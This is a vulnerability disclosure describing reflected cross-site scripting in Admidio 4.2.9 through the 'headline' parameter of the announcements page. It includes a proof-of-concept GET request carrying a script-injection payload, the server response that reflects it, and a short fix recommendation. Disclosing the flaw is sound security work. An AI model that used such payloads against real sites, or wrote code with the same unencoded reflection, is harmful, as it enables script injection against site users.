Cross site scripting in Admidio 4.2.9 via headline parameter in admidio/admidio
Jun 18th 2023
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
Proof of Concept
URL: http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php Vulnerable Parameter: headline # Details: URL encoded GET input headline was set to Announcements"><script>alert(9370)</script> The input is reflected inside a tag parameter between double quotes.
GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script> HTTP/1.1 Referer: http://localhost/admidio-4.2.9/ Cookie: ADMIDIO_admidio_adm_SESSION_ID=1vv2p802t9j8fiek592n3p6uqj; ADMIDIO_admidio_adm_cookieconsent_status=dismiss Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/184.108.40.206 Safari/537.36 Host: localhost Connection: Keep-alive
<p class="lead">The URL in the field <strong>http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script></strong> contains invalid characters.<br /><br />Only alphabetic characters, umlauts, numbers 0-9 and special characters .-+_:/#?= are allowed.</p>
How to fix this vulnerability:
Apply context-dependent encoding and/or validation to user input rendered on a page